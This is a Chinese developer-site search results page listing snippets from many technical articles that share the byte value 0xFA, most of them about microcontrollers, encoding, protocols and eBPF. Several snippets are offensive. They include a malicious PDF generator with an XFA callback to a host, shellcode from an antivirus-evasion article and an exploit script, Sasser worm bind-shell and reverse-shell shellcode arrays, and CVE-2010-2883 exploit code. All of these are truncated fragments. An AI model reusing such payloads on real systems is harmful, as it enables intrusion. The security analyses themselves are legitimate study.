首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏全栈程序员必看

    单片机控制步进电机-AVR详细程序

    ,0XFA2D,0XFA3C,0XFA49,0XFA54,0XFA5D,0XFA65,0XFA6C,0XFA72,0XFA78,0XFA7C,0XFA80,0XFA83,0XFA86,0XFA89,0XFA8B ,0XFA8D,0XFA8F,0XFA90,0XFA91}; //第三段S曲线减速30°:5转/秒启动,0.5转/秒结束 B[67]={0XFA8F,0XFA8D,0XFA8B,0XFA89,0XFA87,0XFA84,0XFA81,0XFA7D ,0XFA79,0XFA73,0XFA6D,0XFA67,0XFA5F,0XFA55,0XFA4A,0XFA3E,0XFA2F,0XFA1F,0XFA0B,0XF9F5,0XF9DB,0XF9BD,0XF99A ,0XFA1F,0XFA2F,0XFA3E,0XFA4A,0XFA55,0XFA5F,0XFA67,0XFA6D,0XFA73,0XFA79,0XFA7D,0XFA81,0XFA84,0XFA87,0XFA89,0XFA8B ,0XFA8D,0XFA8F,0XFA90}; //第六段S曲线反转减速30°:5转/秒启动,1转/秒结束 D[67]={0XFA90,0XFA8F,0XFA8D,0XFA8B,0XFA89,0XFA86,0XFA83,0XFA80,0XFA7C

    94210编辑于 2022-08-23
  • 来自专栏SAS程序分享号号号

    SAS-利用SAS制作CRF注释

    COL1)="DOMAIN" then do; text1='<contents-richtext><body xmlns="http://www.w3.org/1999/xhtml" xmlns:xfa ="http://www.xfa.org/schema/xfa-data/1.0/" xfa:APIVersion="Acrobat:11.0.7" xfa:spec="2.0.2" style="font-size ; end; else do; text1='<contents-richtext><body xmlns="http://www.w3.org/1999/xhtml" xmlns:xfa ="http://www.xfa.org/schema/xfa-data/1.0/" xfa:APIVersion="Acrobat:11.0.0" xfa:spec="2.0.2" style="font-size

    3.9K30编辑于 2022-03-14
  • 来自专栏小点点

    (七)51单片机基础——串口通信

    ; //设置定时初始值 TH1 = 0xFA; //设置定时重载值 ET1 = 0; //禁止定时器1中断 TR1 = 1; //定时器1开始计时 EA = 1; //使能赋值 ; //设置定时初始值 // TH1 = 0xFA; //设置定时重载值 // ET1 = 0; //禁止定时器1中断 // TR1 = 1; //定时器1开始计时 //} unsigned ; //设置定时初始值 TH1 = 0xFA; //设置定时重载值 ET1 = 0; //禁止定时器%d中断 TR1 = 1; //定时器1开始计时 } /** * @brief ; //设置定时初始值 // TH1 = 0xFA; //设置定时重载值 // ET1 = 0; //禁止定时器1中断 // TR1 = 1; //定时器1开始计时 //} unsigned ; //设置定时初始值 TH1 = 0xFA; //设置定时重载值 ET1 = 0; //禁止定时器%d中断 TR1 = 1; //定时器1开始计时 EA = 1; //使能中断

    1.8K20编辑于 2022-12-12
  • 来自专栏python3

    python 字符编码与转换

    将字符串转换为gbk s = "您好" print(s.encode("gbk")) 执行输出 b'\xc4\xfa\xba\xc3' 可以看到输出最前面有一个b 表示这是一个二进制类型,也称之为bytes  s.encode("gbk") #打印gbk print(s_gbk) #打印utf-8,encode()默认使用utf-8 print(s.encode()) 执行输出 utf-8 b'\xc4\xfa s.encode()) gbk_to_utf8 = s_gbk.decode("gbk").encode("utf-8") print("utf8",gbk_to_utf8) 执行输出 utf-8 b'\xc4\xfa 打印默认编码 print(sys.getdefaultencoding()) s = "您好" s_gbk = s.encode("gbk") print(s_gbk) 程序执行 utf-8 b'\xc4\xfa 需要先执行encode("utf-8"),再执行decode("utf-8") 再执行encode("gbk"),输出 b'\xc4\xfa\xba\xc3' 由于它是一个bytes类型,需要转换为字符串

    1.9K20发布于 2018-08-02
  • 来自专栏PHP修行之路

    php一步一步实现mysql协议(三) ——登录认证密码加密

    响应报文类型 第1个字节取值范围 OK 响应报文 0x00 Error 响应报文 0xFF Result Set 报文 0x01 - 0xFA Field 报文 0x01 - 0xFA Row Data 报文 0x01 - 0xFA EOF 报文 0xFE   注:响应报文的第1个字节在不同类型中含义不同,比如在OK报文中,该字节并没有实际意义,值恒为0x00;而在Result Set报文中,该字节又是长度编码的二进制数据结构

    1.1K20发布于 2020-09-16
  • 来自专栏Khan安全团队

    恶意PDF生成器

    filename, host): with open(filename, "w") as file: file.write(''' % a PDF file using an XFA /T () /FT /Btn >>] >>] /XFA >> /Pages <<>> >> >>''') # Adobe Reader - PDF callback via XSLT stylesheet in XFA , host): with open(filename, "w") as file: file.write(''' % a PDF file using an XFA /T () /FT /Btn >>] >>] /XFA

    2K40编辑于 2022-01-04
  • 来自专栏HACK学习

    干货 | Shellcode免杀总结<二>

    byte[] encryptedShellcode = new byte[] { 0x8d,0x81,0xec,0x67,0x71,0x69,0x0e,0xee,0x94,0x58,0xae,0x03,0xfa 0x10,0x15,0x6c,0x4b,0x51,0xa8,0xa1,0x6a,0x70,0xae,0x8c,0x95,0x23,0x3e,0xe5,0x35,0x61,0xe2,0x24,0x5b,0xfa ,0x25,0x7f,0x1f,0x92,0x21,0x6f,0xb6,0x20,0xe2,0x37,0x47,0x70,0xba,0xe5,0x2e,0x69,0x8a,0x54,0x2e,0xfa, ,0x65,0x25,0xec,0x29,0x75,0x6f,0xb4,0xfa,0x6d,0xe5,0x66,0xa1,0xe0,0x2a,0x43,0x55,0x32,0x35,0x06,0x28,0x33,0x3f 0x5f,0xe5,0x51,0x1b,0x29,0x06,0x67,0x61,0x69,0x6e,0x31,0x1b,0x69,0x06,0x3f,0xd5,0x3a,0x8b,0x98,0xa4,0xfa

    2K20发布于 2020-02-17
  • 来自专栏k8s技术圈

    使用 eBPF 在生产环境调试 Go 应用

    6609a5: b9 02 00 00 00 mov $0x2,%ecx 6609aa: f2 0f 10 05 16 a6 0f movsd 0xfa616 (%rip),%xmm0 6609b1: 00 6609b2: f2 0f 10 0d 36 a6 0f movsd 0xfa636(%rip),%xmm1 从中我们可以看到调用 %rsp),%rax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616 (%rip),%xmm0 0x6609b2 <main.computeE+18>: movsd 0xfa636(%rip),%xmm1 这是我们运行跟踪二进制后的情况,我们可以清楚地看到,现在第一条指令是 %rsp),%eax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616

    2.1K20发布于 2020-11-03
  • 来自专栏黑光技术

    【译】如何在生产环境跟踪 GO 函数的参数

    6609a5: b9 02 00 00 00 mov $0x2,%ecx 6609aa: f2 0f 10 05 16 a6 0f movsd 0xfa616 (%rip),%xmm0 6609b1: 00 6609b2: f2 0f 10 0d 36 a6 0f movsd 0xfa636(%rip),%xmm1 %rsp),%rax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616 (%rip),%xmm0 0x6609b2 <main.computeE+18>: movsd 0xfa636(%rip),%xmm1 下面是运行 tracer 二进制跟踪程序后的结果。 %rsp),%eax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616

    1.3K21编辑于 2023-02-15
  • 来自专栏sktj

    python 漏洞利用脚本

    x61\x52\x9b\x82" "\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf" "\x6b\x1e\xfb\x7e\x2d\xfa x3e\x22\x8a" "\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b" "\xbd\xca\x85\xe3\xd7\xc4\xfa x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea" "\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8" "\xfa \x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6" "\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\

    1.2K10发布于 2019-07-31
  • 来自专栏LINUX阅码场

    在生产环境中使用 eBPF 调试 GO 程序

    6609a5: b9 02 00 00 00 mov $0x2,%ecx 6609aa: f2 0f 10 05 16 a6 0f movsd 0xfa616 (%rip),%xmm0 6609b1: 00 6609b2: f2 0f 10 0d 36 a6 0f movsd 0xfa636(%rip),%xmm1 由此可见 %rsp),%rax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616 (%rip),%xmm0 0x6609b2 <main.computeE+18>: movsd 0xfa636(%rip),%xmm1 而这是在我们运行跟踪程序之后。 %rsp),%eax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616

    1.8K10发布于 2021-03-30
  • 来自专栏Serverless+

    [译] 第 1 部分: 在生产环境中使用 eBPF 调试 Go 程序

    6609a5: b9 02 00 00 00 mov $0x2,%ecx 6609aa: f2 0f 10 05 16 a6 0f movsd 0xfa616 (%rip),%xmm0 6609b1: 00 6609b2: f2 0f 10 0d 36 a6 0f movsd 0xfa636(%rip),%xmm1 由此可见 %rsp),%rax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616 (%rip),%xmm0 0x6609b2 <main.computeE+18>: movsd 0xfa636(%rip),%xmm1 而这是在我们运行跟踪程序之后. %rsp),%eax 0x6609a5 <main.computeE+5>: mov $0x2,%ecx 0x6609aa <main.computeE+10>: movsd 0xfa616

    1.6K11发布于 2021-01-12
  • 来自专栏咸鱼学Python

    Python 爬虫进阶必备 | 某采购网站 cookie 加密分析(仿加速乐)

    0x60,0x26,0x79,0xc0,0xc5,0xb1,0x5b,0xaa,0x66,0x8c,0x80,0x36,0x4b,0x07,0x3a,0xe9,0x39,0xea,0x32,0xa5,0xf8,0xa6,0xf5,0xb3,0x0d,0xfa 0xe3,0x83,0x61,0xaa,0xd3,0x29,0x4e,0x01,0x4a,0x2a,0x73,0x94,0x41,0xa6,0x60,0x2c,0x57,0xaf,0xfc,0x30,0x4b,0x11,0x19,0xfa ,0x8c,0x46,0xb7,0xfe,0x1c,0x7b,0x8e,0xef,0xe5,0x17,0xf6,0x0a,0x6b,0xc1,0x0b,0x80,0xa5,0xfa,0xcb,0x2b, 0x50,0x32,0x47,0x82,0x5b,0x86,0x68,0x95,0xca,0x40,0x55,0xbc,0xf9,0x01,0x6a,0x9f,0xc8,0x26,0x45,0x7c,0x91,0xfa

    75810发布于 2021-04-23
  • 来自专栏全栈程序员必看

    从excel文件xlsx中特定单元格中提取图片「建议收藏」

    \xf8\xbf\xbc\xfd\xce\x8f\x7f\xf4\xa3\x1f>zt\xe8\x9c\xfb\xcew\xbe\x13\xc4\xff\xfa\xaf\xff\xfa\xcd\x9b7 \xeb\xaf\x7f\xfa\xc5W\x15{\r\x06\x83\xf3\xb3\xf1\xf7\xbf\xff\xb7? 88\xf8\xcb\xbf\xfc\xcb\xdf\xff\x83\x7fj\x1cu\xa2\xac\xd3\xe9\xfc\xfa\xaf\xff\xfa\xb5k\xfb\x7f\xff\x83 \x88s\xee\xc6\x8d\x1b\xaf\xbe\xfa\x99\xfd\xfd\xfd\xe1ph\x8c\x9b\xcf\xe7\rUED\xf6\xe1[\xdf\xfa\xab\xb7 h\xbe\x81\xda\x83H58Z6H\xa2(R:\xab\x04\xfa\xe0\xd1\x89\x1a\xbe\x92$q\xce!

    8.3K30编辑于 2022-09-14
  • 来自专栏知识分享

    用51单片机+11.0592的晶振,如何产生115200的波特率

    串口工作方式1,8位UART,波特率可变 TMOD |= 0x20 ; //定时器1,工作方式2,自动再装入8位定时器 PCON |= 0x80 ; //SMOD=1; 波特率加倍 TH1 = 0xfa 当SMOD=1时,K=2,波特率加倍,公式为: 波特率=K×11059200/32×12×(256-TH1) 所以,TH1=0xfa=256-(2×11059200/384×波特率) 其中波特率为9600

    1.5K90发布于 2018-04-18
  • 来自专栏极安御信安全研究院

    Adobe Reader 缓冲区溢出漏洞 (CVE-2010-2883)漏洞分析报告

    # form object xref << pdf.length pdf << ioDef(13) pdf << nObfu("<</XFA ") << ioRef(14) << nObfu(">>") << eol pdf << endobj # form stream xfa = << > <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config xmlns="http://www.<em>xfa</em>.org/schema/xci/2.6/"> <present><pdf><interactive>1</interactive></pdf></present> </config> <template xmlns="http://www.<em>xfa</em>.org /schema/<em>xfa</em>-template/2.6/"> <subform name="form1" layout="tb" locale="en_US"> <pageSet></pageSet> </subform

    81910编辑于 2022-01-20
  • 来自专栏全栈程序员必看

    各种转码(bytes、string、base64、numpy array、io、BufferedReader )

    -\xa4\xab\x1c\xfa+]\xca! \xfe\xd5\xcb\xfa\xef\x7fv\xfa\xe9\xab\xe9qi\xd5\xa3\xea\x05\x84\x88\x14\x85\xd1U<LQN\x02&f\x12\xe6\xea \xff\xfa\xa4J\x87\xdd8\x8eck\xad4\xfd\xd1/\xbe\xfa\xfa\xcd\xfb\xda\xec\xf12\xdf\xecwB\xf4\xee\xfeq\xc5 \xff\xfa\xa7\xff\xec\xabo_! \xfag\xff\xfd\xbf\xfa\xfa\x9b\xd7\xcf\x9e=#\x96\xd6.

    7.9K20编辑于 2022-09-14
  • 来自专栏全栈程序员必看

    c语言病毒源码讲解,【病毒】震荡波病毒C语言源码「建议收藏」

    unsigned char bsh[]={ 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA 0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22, 0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA unsigned char rsh[]={ 0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA 0xAA,0xDE,0x89, 0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55, 0xE2,0xFA

    2.6K20编辑于 2022-07-29
  • 来自专栏数据挖掘

    python之chardet库

    encoding(编码形式)': 'utf-8'} 没见识到这个库之前所有编码纯属自己的记忆: # unicode_escape \u4e2d\u56fd # gbk或者utf-8 \xd6\xd0\xb9\xfa

    83340发布于 2019-07-02
  • 来自专栏全志嵌入式那些事

    全志D1-H移植为7寸MIPI屏

    0xBE, 0x96, 0x91, 0x8F, 0xFF} }, + {0xF3, 1, {0x03} }, + {0xF4, 26, {0xFF, 0xFE, 0xFC, 0xFA 0x2F, 0x1F, 0x17, 0x0F,0x0B, 0x07, 0x05, 0x03, 0x01, 0x00} }, + {0xF5, 26, {0xFF, 0xFE, 0xFC, 0xFA 0x2F, 0x1F, 0x17, 0x0F,0x0B, 0x07, 0x05, 0x03, 0x01, 0x00} }, + {0xF6, 26, {0xFF, 0xFE, 0xFC, 0xFA 0x00, 0x00, 0x00, 0x00} }, + {0xF9, 7, {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} }, + {0xFA 0xBE, 0x96, 0x91, 0x8F, 0xFF} }, + {0xF3, 1, {0x03} }, + {0xF4, 26, {0xFF, 0xFE, 0xFC, 0xFA

    53110编辑于 2024-02-02
领券